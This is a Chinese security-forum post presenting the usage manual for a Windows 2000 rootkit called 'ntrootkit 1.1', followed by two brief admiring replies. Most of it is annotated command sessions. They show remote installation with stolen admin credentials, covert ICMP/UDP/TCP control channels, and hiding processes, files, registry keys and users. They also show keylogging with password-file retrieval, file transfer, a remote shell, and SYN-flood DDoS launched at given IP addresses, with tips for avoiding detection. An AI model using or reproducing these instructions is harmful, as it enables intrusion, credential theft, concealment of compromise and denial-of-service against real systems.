|
 | 作者: meiying [meiying]
 版主 |
登录 |
| yyt_hac's ntrootkit 1.1 使用说明 一、简介 本ntrootkit采用无连接协议,不开端口,有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp),注意第三种 方式,它只是使用了tcp数据包进行通讯,并没有建立tcp连接,用这种方式只要把目标端口设置成任意一个目标机器上 开的端口,一般都会成功的机会很大。它隐藏进程,文件,目录,服务,注册表项,提供一些很有用的命令。由于该ro otkit有ddos功能,请不要公开传播!如果已经安装了ntrootkit 1.0,必须用'-i'选项升级,重起系统后生效。 ntrootkit 1.1版增加了远程安装,ddos,键盘记录功能,该版本不公开,需要的可向我要。 二、使用环境 Windows 2000系列操作系统(包括客户端和服务器端) 三、使用步骤 说明: 下面是我在命令行下的使用结果,只要使用过命令行工具的人应该都可以看懂,/*.....*/之间的部分是我加的注释。 1、安装服务器端 F:\letmein>psexec \\202.39.*.* cmd.exe /* 用psexec登录远程机器 */ PsExec v1.31 - execute processes remotely Copyright (C) 2001-2002 Mark Russinovich www.sysinternals.com Microsoft Windows 2000 [�━� 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>cd .. C:\WINNT\system32>ntrootkit -h This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Usage:ntrootkit [-v/-m/-u [password]/-i [password]] -v-------------show the ntrootkit version that is installed -u [password]--uninstall the ntrootkit,you must reboot to exit ntrootkit and ins tall new one -i [password]--update the ntrootkit,the new version will be run after reboot -m-------------show the work mode of the ntrootkit Usage:ntrootkit \\ip -u username -p password ip-------------the computer you want to install ntrootkit in username-------the username of remote computer that have administrator's privile ge password-------the password of the user /*-v-------------显示已安装的ntrootkit版本*/ /*-u [password]--卸载ntrootkit,password是ntrootkit的连接密码,默认为yyt_hac*/ /*-i [password]--升级ntrootkit*/ /*-m [workmode]--显示或设置ntrootkit当前工作模式(0--sniffer,1--driver)*/ /*-f-------------强制以windows 2000 sniffer模式工作,在用正常模式安装不成功时使用*/ /*远程安装功能的使用说明*/ /*\\ip-----------要安装rootkit的机器ip地址*/ /*-u username----远程机器上具有管理员权限的帐号*/ /*-p password----帐号的密码,密码为空时不用写*/ C:\WINNT>ntrootkit /* 安装ntrootkit,假设ntrootkit服务器端已经放在远程机器的 */ This is yyt_hac's ntrootkit server 1.1 /* c:\winnt目录下,文件名为ntrootkit.exe */ Welcome to http://www.yythac.com Exacting files.....ok Installing service..ok Starting up The Ntrootkit..ok The Ntrootkit is installed and started successfully! C:\WINNT>ntrootkit -m /*查看ntrootkit的运行模式,这里的输出是说ntrootkit当前的运行*/ ntrootkit -m /*模式是windows 2000监听模式,该模式用监听网络和raw socket来*/ This is yyt_hac's ntrootkit server 1.1 /*发送和接收数据包,因此效率比较低,在网络忙的时候可能连不上*/ Welcome to http://www.yythac.com /*服务器端,另一种模式是利用网络驱动程序来收发数据包,因此效*/ /*高,一般都使用这种模式,只有当这种模式不能用时,才用监听模式*/ The ntrootkit is using windows 2000 sniffer mode to recv packet This mode is not so effective,and if the network is buzy,you may be can't connect to the server /*E:\NTROOTKIT\Release>ntrootkit -m /*This is yyt_hac's ntrootkit server 1.1 /*Welcome to http://www.yythac.com /*The ntrootkit is using network driver to recv and send packet /*This work mode is effective*/ /*这里是另一种工作模式时的输出*/ C:\WINNT\>ntrootkit -v /*显示改机器上安装的ntrootkit版本*/ ntrootkit -v This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com The Version of Ntrootkit that is installed is 1.1 C:\WINNT\system32>ntrootkit -i /*升级ntrootkit*/ ntrootkit -i yyt_hac This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Please enter you password: Please wait a minute..... Update successfully,the new version very runs after system reboots! C:\WINNT>del ntrootkit.exe /*删除安装文件*/ C:\WINNT>exit cmd.exe exited on 202.39.*.* with error code 0. F:\letmein>ntrootkit \\202.38.*.* -u administrator -p 123456 /*远程安装功能,密码为空时不用写*/ This is yyt_hac's ntrootkit server 1.1 Welcome to http://www.yythac.com Connecting to remote computer...ok Exacting files.....ok Installing service..ok Starting up The Ntrootkit..ok Disconnecting...ok The Ntrootkit is installed and started successfully! F:\letmein> 2、用客户端连接到服务器端 F:\letmein>rtclient It is yyt_hac's ntrootkit client 1.1 Welcome to http://www.yythac.com usage:rtclient destip [-p password] [-t proto] [-o port] [-y icmp_type] [-d icm p_code] [-m MTU] [-c Command] destip-------------The computer you want to connect password-----------The ntrootkit's password proto--------------The proto that ntrootkit will use(0:userdefined,1:icmp,2:udp, 3:tcp) port---------------The dest udp or tcp port which send packet to(default is 445 MTU----------------The MAX packet size the ntrootkit will use to send packet icmp_type----------The icmp packet type which send to server,default is ICMP_ECH O REPLY icmp_code----------The icmp packet code which send to server,default is 0 Command------------The command which you want the server to do The DDos command usage:DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DD os_ProcCount] DDos_Destip--------The computer you want to DDos DDos_Destport------The Destport you want to DDos(default is 445) DDos_type----------The DDos type you want to use(0:ping flood,1:udp flood,2:syn flood,3:mstream flood,default is 0) DDos_seconds-------The seconds you want to DDos the dest(default is 150s) DDos_ProcCount-----The process count which the server use to ddos(default is 10) Example:rtclient 1.1.1.100 -p yyt_hac -t 1 -c ddos 1.1.1.23 139 2 300 20 /*下面是icmp_type和icmp_code的值和含意,icmp_type就是类型,默认是0(回显应答),icmp_code就是代码*/ /*默认是0*/ 类型 代码 描述 查询 差错 0 0 回显应答( P i n g应答,第7章) ? 3 目的不可达: 0 网络不可达( 9 . 3节) ? 1 主机不可达( 9 . 3节) ? 2 协议不可达 ? 3 端口不可达( 6 . 5节) ? 4 需要进行分片但设置了不分片比特( 11 . 6节) ? 5 源站选路失败(8 . 5节) ? 6 目的网络不认识 ? 7 目的主机不认识 ? 8 源主机被隔离(作废不用) ? 9 目的网络被强制禁止 ? 1 0 目的主机被强制禁止 ? 11 由于服务类型TO S,网络不可达(9 . 3节) ? 1 2 由于服务类型TO S,主机不可达(9 . 3节) ? 1 3 由于过滤,通信被强制禁止 ? 1 4 主机越权 ? 1 5 优先权中止生效 ? 4 0 源端被关闭(基本流控制, 11 . 11节) ? 5 重定向(9 . 5节): ? 0 对网络重定向 ? 1 对主机重定向 ? 2 对服务类型和网络重定向 ? 3 对服务类型和主机重定向 ? 8 0 请求回显( P i n g请求,第7章) ? 9 0 路由器通告( 9 . 6节) ? 1 0 0 路由器请求( 9 . 6节) ? 11 超时: 0 传输期间生存时间为0(Traceroute, 第8章) ? 1 在数据报组装期间生存时间为0(11 . 5节) ? 1 2 参数问题: 0 坏的I P首部(包括各种差错) ? 1 缺少必需的选项 ? 1 3 0 时间戳请求( 6 . 4节) ? 1 4 0 时间戳应答( 6 . 4节) ? 1 5 0 信息请求(作废不用) ? 1 6 0 信息应答(作废不用) ? 1 7 0 地址掩码请求(6 . 3节) ? 1 8 0 地址掩码应答(6 . 3节) ? L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 /*因为默认445端口没开*/ It is yyt_hac's ntrootkit client 1.0 /*所以连不上*/ Welcome to http://www.yythac.com Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Time out,Please make sure the targer is up and try again L:\c\rootkit\44\RTCLIENT\Release>rtclient 202.38.*.* -p yyt_hac -t 3 -o 139 /*用开的tcp端口*/ It is yyt_hac's ntrootkit client 1.1 /*用udp协议时也一样要*/ Welcome to http://www.yythac.com /*用开的udp端口*/ Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Welcome to yyt_hac's ntrootkit Server 1.0,use '?' command to get command list CMD> F:\letmein>rtclient 202.39.*.* -p yyt_hac It is yyt_hac's ntrootkit client 1.1 Welcome to http://www.yythac.com Getting ip address of the computer... 1. 1.1.1.89 2. 1.1.1.200 Please Select the number of the ip address you want to use to send and recv packet:1 Welcome to yyt_hac's ntrootkit Server 1.1,use '?' command to get command list CMD>? ********yyt_hac's ntrootkit Server Command List******** ?-------------------------------Show this list HideFileDir [FileName or DIR]----------------------Hide the file or directory(no para will show all file or directory been hidden) HideProcId [pid]----------------Hide process with the id HideProcName [procname]---------Hide process with the process name HideKey [KeyName]---------------Hide the registry key HideValue [ValueName]-----------Hide the registry value HideUser [UserName]-------------Hide the User HideServ [ServiceName]----------Hide the Service ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden be fore ShowProcId pid------------------UnHide the process that been hidden before with the id ShowProcName procname-----------UnHide the process that been hidden before with the process name ShowKey KeyName-----------------UnHide the registry key ShowValue ValueName-------------UnHide the registry value ShowUser UserName---------------UnHide the user that been hidden before ShowServ ServiceName------------UnHide the service that been hidden before Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer KeyLogOn------------------------------Start key log KeyLogOff-----------------------------Stop key log DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos th e destip SDDOS---------------------------------Stop DDos GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file to local computer DelPwd--------------------------------Del the ntrootkit keylog password file Ps------------------------------------Show all processes on remote machine Kill pid------------------------------Kill the process with the id or name RTVer---------------------------------Show Ntrootkit server version and author i nfo SetPass [NewPassword]-----------------Change or show the connection password Reboot--------------------------------Reboot the targer computer OpenShell-----------------------------Open a command shell Exit----------------------------------Exit the shell or rootkit /*?-----------------------------------显示ntrootkit命令列表*/ /*Hide系列命令不带参数表示显示隐藏列表*/ /*HideFileDir [FileName or DIR]-------隐藏文件或者目录,可以用*号通配符,隐藏重起后还有效*/ /*HideProcId [pid]-------------------隐藏进程号为pid的隐藏,重起后不在隐藏*/ /*HideProcName [procname]-------------隐藏进程名为procname的进程,可以用*号通配符,隐藏重起后还有效*/ /*HideKey [KeyName]-------------------隐藏键名为KeyName的注册表键,可以用*号通配符,隐藏重起后还有效*/ /*HideValue [ValueName]---------------隐藏键值名为KeyName的注册表键值,可以用*号通配符,隐藏重起后还有效*/ /*HideUser [UserName]-----------------隐藏用户名为UserName的用户,可以用*号通配符,隐藏重起后还有效*/ /*HideServ [ServiceName]--------------隐藏服务名为ServiceName的服务,可以用*号通配符,隐藏重起后还有效*/ /*ServiceName是服务名,而不是服务显示名,比如telnet服务的服务名是TlntSvr,而显示名是Telnet*/ /*Show系列命令就是把隐藏的东西重新显示出来,就不再一一介绍了*/ /*Get RemoteFilePath [LocalFilePath]----把远程机器上的文件取回来,必须写全路径*/ /*Put LocalFilePath [RemoteFilePath]----把本地机器上的文件放到远程机器上*/ /*KeyLogOn------------------------------开始键盘记录*/ /*KeyLogOff-----------------------------停止键盘记录*/ /*DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]-------ddos攻击命令,其中 DDos_Destip是要ddos的机器的ip地址,DDos_Destport是要ddos的端口,DDos_type是ddos攻击的类型,0表示 ping floo d,1表示udp flood,2表示syn flood,3表示mstream flood,DDos_seconds是进行ddos攻击的秒数,DDos_ProcCount是ddos 攻击的进程数。*/ /*SDDOS---------------------------------停止DDos攻击*/ /*GetPwd [LocalFilePath]----------------取回记录的密码文件,LocalFilePath是取回后的文件路径,默认是客户端 目录下rt_passfile.txt*/ /*DelPwd--------------------------------删除密码文件*/ /*Ps------------------------------------查看远程机器上的进程*/ /*Kill pid------------------------------杀掉远程机器上进程号为pid的进程*/ /*RTVer---------------------------------显示远程机器上安装的ntrootkit版本信息*/ /*SetPass [NewPassword]-----------------更改ntrootkit连接密码,不带参数则显示目前用的密码,默认为yyt_hac*/ /*Reboot--------------------------------重起远程机器*/ /*OpenShell-----------------------------开命令行窗口*/ /*Exit----------------------------------退出shell或者ntrootkit*/ CMD>ps /*查看服务器上的进程,由于ntrookit服务器端进程没有*/ ProcessID ProcessName 0 [System Process] /*被hook,因此它用系统原来的函数列出进程,所以被隐藏*/ 8 System /*的进程也会被列出*/ 176 smss.exe 200 csrss.exe 224 WINLOGON.EXE 252 services.exe 264 LSASS.EXE 452 svchost.exe 508 spoolsv.exe 536 NETDDE.EXE 1364 ntfrs.exe 1392 NTservice.exe 1404 NTweb.exe 1412 CCP.exe 1900 termsrv.exe 1952 winmgmt.exe 1968 winvnc.exe 1992 dns.exe 2032 inetinfo.exe 2076 ismserv.exe 2512 explorer.exe 2720 internat.exe 2728 sqlmangr.exe 2652 plog.exe 2624 SysArchive.exe 2752 svchost.exe 3160 DWRCS.EXE 11544 SpntSvc.exe 23028 CCProxy.exe 27096 mshta.exe 27980 PSEXESVC.EXE 28008 cmd.exe 27872 rtkit.exe CMD>pskill 27096 command not regnized! /*命令没有实现,输错了*/ CMD>kill 27096 /*杀掉进程id为27096的进程*/ process is been killed ! CMD>rtver /*ntrookit版本信息*/ The ntrootkit version is 1.1, welcome to http://www.yythac.com CMD>hideprocid /*查看被隐藏进程id*/ The Hide ProcId: CMD>keylogon /*打开键盘记录功能*/ Key log Start successfully CMD>ddos 202.119.71.142 139 2 30 /*对202.23.3.14的139端口进行syn flood 攻击30秒钟*/ DDos dip:202.119.71.142,DDos dport:139,DDos type:2,DDos seconds:30,DDos process count:10, DDos started successfully! CMD>ddos 202.23.3.14 139 2 30 /*ddos已经开始*/ DDos already started CMD>sddos /*停止ddos攻击*/ Stop DDos sucessfully! CMD>openshell /*开命令行窗口*/ Microsoft Windows 2000 [�━� 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>hideprocid /*这里可以看到有进程27096被隐藏,这个进程是开命令行*/ The Hide ProcId: /*窗口时创建的cmd进程,会被自动加入隐藏列表,在退出*/ 27096 /*命令行窗口时会被删除*/ C:\WINNT\system32>hideprocid 1500 /*表示隐藏进程id为1500的进程,该隐藏是临时的,机器*/ HidePocId:successfully /*重起后该id的进程不会被隐藏,其它的隐藏命令都是*/ /*持久的,机器重起后还是会被隐藏,只有用Show*命令*/ C:\WINNT\system32>cd \ /*才能使它们不隐藏*/ cd \ C:\>dir/w /*可以看到有logfile.txt文件*/ dir/w 合盒跋 C い�汉虾楔SΤ夹乓�C 合盒跋�歉�: B472-5102 ヘ魁: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] �s�� ゅセゅ?.txt 19 �永僧� 3,586,720 �欷覆� 10 �鹰乜� 1,213,169,664 �欷覆榨iノ C:\>hidefiledir *logfile.txt /*表示隐藏以logfile.txt结束的所有文件和目录,*是通配符*/ HideFileDir:successfully /*可以表示0至多个字符,通配符不能乱用,否则可能隐藏很多*/ /*东西而被用户发现异常,重起后该文件还是会被隐藏*/ /*其它的hide命令和这个命令的用法一样*/ C:\>dir/w /*可以看出logfile.txt文件没有了*/ dir/w 合盒跋 C い�汉虾楔SΤ夹乓�C 合盒跋�歉�: B472-5102 ヘ魁: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] �s�� ゅセゅ?.txt 18 �永僧� 3,586,582 �欷覆� 10 �鹰乜� 1,213,169,664 �欷覆榨iノ C:\>hidefiledir /*显示已经被隐藏的文件或目录列表*/ The Hide File or Dir: *LOGFILE.TXT C:\>showfiledir *logfile.txt /*使已经隐藏的文件或目录不隐藏*/ ShowFileDir:successfully /*其它的show命令和这个命令的用法一样*/ C:\>showfiledir *logfile.txt ShowFileDir:already hidden or not found C:\>dir/w /*可以看到有tsc.zip文件*/ dir/w /*logfile.txt文件不隐藏了*/ 合盒跋 C い�汉虾楔SΤ夹乓�C 合盒跋�歉�: B472-5102 ヘ魁: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] �s�� ゅセゅ?.txt 19 �永僧� 3,586,720 �欷覆� 10 �鹰乜� 1,213,169,664 �欷覆榨iノ C:\>get tsc.zip /*一定要写全路径,不然不会成功*/ Can't open file C:\>get c:\tsc.zip c:\tsc.zip /*把服务器上的c:\tsc.zip文件传到本地机器的c:\tsc.zip*/ ................................................................................ ................................................................................ ..................Get file sucssesfully! C:\>put c:\logfile.txt c:\f.txt /*把本地机器上的c:\logfile.txt文件放到因此机器的c:\f.txt*/ .....Put file successfully! /*也要加完整路径*/ C:\>dir/w /*可以看到f.txt已经有了*/ dir/w 合盒跋 C い�汉虾楔SΤ夹乓�C 合盒跋�歉�: B472-5102 ヘ魁: C:\ 89.bat Ad1nt40.zip ADMIN.CSV ADMIN2.CSV ADMIN3.CSV ADMIN4.CSV BHP015.IN_ [chenhu2] DNSMGMT.MS_ [Documents and Settings] f.txt [FASROOT] [ie] [Inetpub] logfile.txt MD56KVCDRV.exe [MSSQL7] PARSER.IN_ PDOXUSRS.NET [Program Files] ququ ra_slave.log sql [Tappupdate] TEMP.SYS [test] tsc.zip WARRING.txt [WINNT] �s�� ゅセゅ?.txt 20 �永僧� 3,593,221 �欷覆� 10 �鹰乜� 1,213,161,472 �欷覆榨iノ C:\>del f.txt del f.txt C:\>exit /*退出shell*/ CMD>exit /*退出ntrootkit*/ exit successfully bye bye F:\letmein> 四、关于连接不上服务器问题的解答(请先看上面的使用说明) 1、确定远程机器开着并且已经成功安装了ntrootkit服务器端。 2、如果你在局域网内而没有外部ip地址,则只能使用udp或tcp协议连接,不过可以选择不同的目标端口,最好选择远 程机器打开的udp或tcp端口,因为没有打开的端口数据包可能会被防火墙拦截,常用的udp端口有445,137,138,500, 4000,53等,tcp端口有445,139,80,21,23,135等等,可以通过-o 选项指定,默认是445端口。 3、服务器端和客户端不能在同一台机器上,否则连不上。 4、如果你的机器有外部ip,就可以尝试所有的协议,特别是icmp协议有很多种数据包,根据你的判断使用合适的,默 认是客户端发到服务器端是icmp echo reply数据包,服务器端到客户端是端口不可到达icmp数据包。 5、如果你没有正常退出ntrootkit,就是没有用exit命令退出,请等几分钟再连接。 6、如果ntrootkit服务器端的工作模式是windows2000监听模式,请在网络不忙的时候连,否则连接不上的可能性比较大。 7、确定连接密码是否正确,默认是yyt_hac,你是否用setpass命令改了连接密码。 8、运行客户端的机器最好不要运行防火墙,否则服务器端返回的数据包有可能被拦截。 9、远程机器可能装了多操作系统,而目前运行的是没有被安装ntrootkit的操作系统,或者操作系统重装了。 10、远程机器的防火墙或者途中的路由器设置得太严格,以至这么多类型的数据包都没法通过。 11、远程机器上的ntrootkit被人发现了,以至被卸载了。 12、客户端和服务器端不匹配,请用同一个压缩包里的客户端和服务器端。 目前就这么多,以后想到再加,^_^ 五、和我联系 个人主页:http://www.yythac.com Email:webmaster@yythac.com QQ:47090005 icq:272288117 |
| 地主 发表时间: 04/11 21:15 |
| 回复: ricky [ricky]  版主 |
登录 |
|
看来你的朋友对于底层很有研究啊 |
| B1层 发表时间: 04/12 17:14 |
 | 回复: zengwenlin [zengwenlin]  论坛用户 |
登录 |
|
你好呀 看样子 你好扎实呀 我就很敬佩你这种人 如果你愿意的话 我想成为你的一名学生 你有什么事 我一定会尽力帮你的 不过 想你这样的人 应该没有什么让我帮忙的哦 你说是吗? 呵呵 |
| B2层 发表时间: 04/14 06:53 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 原创软件
标题: 朋友写的小马,想找他切磋就去骚扰他吧,嘿嘿,可别出卖我啊!